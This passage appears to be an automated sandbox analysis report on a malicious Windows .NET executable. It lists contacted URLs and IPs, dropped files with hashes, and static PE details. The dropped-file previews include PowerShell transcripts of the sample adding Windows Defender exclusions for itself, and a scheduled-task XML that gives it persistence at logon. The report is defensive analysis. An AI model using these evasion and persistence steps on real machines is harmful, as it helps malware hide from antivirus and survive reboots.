http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://vbcity.com/forums/t/51894.aspx	Ms5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Ms5nQdSz5l.exe, 00000000.00000002.244358631.00000000030A1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.439791337.00000000048F1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/MrCylops	Ms5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.102.136.180	safifinancial.info	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	404105
Start date:	04.05.2021
Start time:	18:00:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Ms5nQdSz5l.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@19/19@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 9.4% (good quality ratio 8.3%) Quality average: 71.1% Quality standard deviation: 32.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 80 Number of non-executed functions: 151
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 92.122.145.220, 52.255.188.83, 184.30.24.56, 2.20.142.210, 2.20.142.209 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:00:58	API Interceptor	2x Sleep call for process: Ms5nQdSz5l.exe modified
18:01:47	API Interceptor	175x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe	Refno.191938.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ms5nQdSz5l.exe.log Download File
Process:	C:\Users\user\Desktop\Ms5nQdSz5l.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.993014478972177
Encrypted:	false
SSDEEP:	384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
MD5:	8D5E194411E038C060288366D6766D3D
SHA1:	DC1A8229ED0B909042065EA69253E86E86D71C88
SHA-256:	44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
SHA-512:	21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
Malicious:	false
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22288
Entropy (8bit):	5.345016330366643
Encrypted:	false
SSDEEP:	384:NtCDvh366U7TE/3ETQ0GfSvVkNI1JN8nudTdvXhiDq1dPlV36SC:Ah3w7QV0GfuxXSudriqkv
MD5:	1EBB1B5FB0B7ACC09F512DFE26626C2C
SHA1:	497DDA1C651EB4BD8B9838A379E9A2AA83BE8CA8
SHA-256:	C69DE25A9D02B569E35A2DA12DA18047DE3E9B5AC89E7A29FE7C857F84D51434
SHA-512:	27F49A2DC205E89F8E5C464CA7C52F998E30B35933B9605832AC34AF999F45BD3FF13A0B7A5166278C834AD37AD36DCE4542ABDEC179454BA9D67443A6A1624A
Malicious:	false
Preview:	@...e...........}...........9.&.........B............@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ezrs2lx.0rw.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ou42d2p.ttg.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cojxddbh.ady.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezlnymm1.v0f.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mw4rjusx.4te.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_taqi1ccw.3sg.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\tmp7635.tmp Download File
Process:	C:\Users\user\Desktop\Ms5nQdSz5l.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1651
Entropy (8bit):	5.187829387108834
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBPtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3n
MD5:	F535A1CF3963F9448B38B8A69C6686F9
SHA1:	F31057609E3B939343C10350A6A00D69D78A794C
SHA-256:	8F1062BA8F06B04A3BFD494B93BC1BE307B7EBF64855965E8BA6C39BA2071DA4
SHA-512:	B5EFD180EB2C8525C8A73BBB82ADF4860EFB1225E4E9130191245A7ACBF3B02359588FBEED4C0924D5481A35DE4CBE72E1D3CFC45D5D9C205DBA1B79F975C0DF
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t

C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe Download File
Process:	C:\Users\user\Desktop\Ms5nQdSz5l.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	734720
Entropy (8bit):	7.525234190780704
Encrypted:	false
SSDEEP:	12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
MD5:	BA01DF16E4C876E078348FD4479A8FDF
SHA1:	6C7F20976D3E7D9BF9F8A410CBC54962D1EF52BB
SHA-256:	8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
SHA-512:	7D828277F9DFD39755B015CB25EE713159C2CF9D812EA938B408E0C21B9004B72D9EFA21DEF95DFA307838DB56558FD8E507AD10B887E1ED7CA1219A53E8747C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: Refno.191938.xlsx, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@.....................................O.... ..,H..........................h................................................ ............... ..H............text........ ...................... ..`.rsrc...,H... ...J..................@..@.reloc...............4..............@..B........................H.......................P................................................0............(....(..........(.....o..........................( ......(!......("......(#......($....N..(....oU...(%....&..(&.....s'........s(........s)........s........s+............0...........~....o,....+...0...........~....o-....+...0...........~....o.....+...0...........~....o/....+...0...........~....o0....+..&..(1.......0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....

C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Ms5nQdSz5l.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20210504\PowerShell_transcript.414408.c0oGFjmQ.20210504180103.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5767
Entropy (8bit):	5.383728622337322
Encrypted:	false
SSDEEP:	96:BZk/jN0GqDo1Z2aZo/jN0GqDo1ZG4J+JQJjZC/jN0GqDo1Zc5JAJAJbZ8:S
MD5:	76A00F68B68E479F8371D52299EA90F6
SHA1:	A7848A7795C197B06CA4B8532294F850D2D33E3F
SHA-256:	1BD6E89EDF41C46DDBC23A0052157BF76794E9C72C86E83959876C79D9FBF682
SHA-512:	9C7D34139454DD9E1D63A1F5AA90DBE4FAA90D5FA7C0F7BE505FF126057DC04AB15543EC7B62E78C9E7E2B542168B0BA4FC648AB078ADCE54F6D21AABDD149C6
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210504180131..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Ms5nQdSz5l.exe..Process ID: 6188..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210504180132..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Ms5nQdSz5l.exe..********************..Windows PowerShell transcript start..Start time: 20210504181059..Username: computer\user..RunAs User: computer\user..Configu

C:\Users\user\Documents\20210504\PowerShell_transcript.414408.wXuZe1kL.20210504180105.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5815
Entropy (8bit):	5.407233157690023
Encrypted:	false
SSDEEP:	96:BZW/jNqqDo1ZbZ7/jNqqDo1ZDeI2jZ8/jNqqDo1Z+TGGdZO:N
MD5:	CA8D4AA1CA34D612F4136A0BCF99E896
SHA1:	F66B1CA38CD5EA53CA2FDA5D1B759ED6271B50B5
SHA-256:	F656F3DB794414791EBA929B28713CC13D2D2611257E005A746729BBAD1EF66D
SHA-512:	D1348AD0823A306B31D69B4EC504C3CDE49D9A15BAB832600065B925A5080E5C0CD78E060DDE46807FAE1AA429B54F26CD2A12631684D2711F4C360954E0AA32
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210504180133..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..Process ID: 6208..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210504180134..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..********************..Windows PowerShell transcript start..Start time: 20210504180923..Username: computer\user..RunAs User: DESKTOP

C:\Users\user\Documents\20210504\PowerShell_transcript.414408.zUtNgT0P.20210504180107.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5815
Entropy (8bit):	5.406659293776376
Encrypted:	false
SSDEEP:	96:BZy/jNmqDo1ZYZ//jNmqDo1ZteI2jZ0/jNmqDo1ZoVTGGPZE:vw
MD5:	3128F27F3B23CC5B6E47AB2DE5D6EEA7
SHA1:	C888FF2E9AFDD554A3BA7D920070B93405853753
SHA-256:	DD91D6BD384E5ACE1F47439FE463F3EB4D03DE78A537E038A7BDEF7B6B5A8DBB
SHA-512:	12C21C1680ADFC68CA91F339842F726E08436E99FDF9F1AB2BD0FBB23E64E3591B176E1633FB7DA54BDE802E097C8EE909457D4AA20B89D3F39EBE311496B02E
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210504180137..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..Process ID: 6424..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210504180137..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..********************..Windows PowerShell transcript start..Start time: 20210504180747..Username: computer\user..RunAs User: DESKTOP

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.525234190780704
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Ms5nQdSz5l.exe
File size:	734720
MD5:	ba01df16e4c876e078348fd4479a8fdf
SHA1:	6c7f20976d3e7d9bf9f8a410cbc54962d1ef52bb
SHA256:	8353e30c6566795da3e5aa38a22b4707ee895cfa115ffa399cfbe7d57d00f91d
SHA512:	7d828277f9dfd39755b015cb25ee713159c2cf9d812ea938b408e0c21b9004b72d9efa21def95dfa307838db56558fd8e507ad10b887e1ed7ca1219a53e8747c
SSDEEP:	12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@................................

File Icon


Icon Hash:	dcb29292c8ccf6c8

Static PE Info

General
Entrypoint:	0x4b06d6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xDA32965F [Tue Jan 1 18:33:03 2086 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
